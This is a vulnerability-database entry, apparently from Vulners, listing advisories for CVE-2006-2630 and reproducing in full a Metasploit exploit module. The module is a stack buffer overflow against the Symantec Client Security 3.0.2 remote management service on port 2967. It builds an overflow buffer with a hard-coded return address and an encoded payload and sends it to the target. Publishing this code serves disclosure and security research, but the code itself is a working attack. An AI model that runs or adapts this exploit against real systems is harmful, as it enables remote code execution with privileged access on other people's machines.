Lucene search
+L

Symantec Remote Management Buffer Overflow

🗓️ 08 Sep 2006 18:35:30Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

Symantec Remote Management Buffer Overflow in Symantec Client Security 3.0.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-2630
9 May 201000:00
circl
Check Point Advisories
Symantec AntiVirus Real Time Virus Scan Service Stack Overflow (CVE-2006-2630)
18 Nov 200900:00
checkpoint_advisories
CVE
CVE-2006-2630
27 May 200621:00
cve
Cvelist
CVE-2006-2630
27 May 200621:00
cvelist
Exploit DB
Symantec Remote Management - Remote Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
NVD
CVE-2006-2630
27 May 200621:02
nvd
Packet Storm
Symantec Remote Management Buffer Overflow
26 Nov 200900:00
packetstorm
Prion
Stack overflow
27 May 200621:02
prion
Saint
Symantec real-time scan service buffer overflow
13 Jun 200600:00
saint
Saint
Symantec real-time scan service buffer overflow
13 Jun 200600:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Symantec Remote Management Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Symantec Client Security 3.0.x.
        This module has only been tested against Symantec Client Security 3.0.2
        build 10.0.2.2000.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-2630'],
          ['OSVDB', '25846'],
          ['BID', '18107'],
          ['URL', 'http://research.eeye.com/html/advisories/published/AD20060612.html'],
        ],
      'Privileged'     => true,

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'SCS 3.0.2 build 10.0.2.2000', { 'Ret' => 0x69985624 } ], # Dec2TAR.dll
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2006-05-24'))

    register_options(
      [
        Opt::RPORT(2967)
      ])
  end

  def exploit
    connect

    header =  "\x01\x10\x0a\x20\x0a\x00\x00\x00"
    header << "\x02\x18\x00\x01\x00\x00\x00\x00"
    header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
    header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"

    crufta =  rand_text_alphanumeric(512)
    cruftb =  rand_text_alphanumeric(514)
    cruftc =  payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
    cruftd =  rand_text_alphanumeric(495)

    cruftd[479, 2] = "\xeb\x06"
    cruftd[483, 4] = [target.ret].pack('V')
    cruftd[487, 5] = [0xe8, -1000].pack('CV')

    cruftd << rand_text_alphanumeric(21)
    crufte =  rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
    crufte << rand_text_alphanumeric(504) + "\x00\x00"

    overflow =  [ crufta.length ].pack('v') + crufta
    overflow << [ cruftb.length ].pack('v') + cruftb
    overflow << [ cruftc.length ].pack('v') + cruftc
    overflow << [ cruftd.length ].pack('v') + cruftd
    overflow << [ crufte.length ].pack('v') + crufte

    sploit = header + overflow

    print_status("Trying target #{target.name}...")
    sock.put(sploit)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.4High risk
Vulners AI Score7.4
CVSS 210
EPSS0.73558
23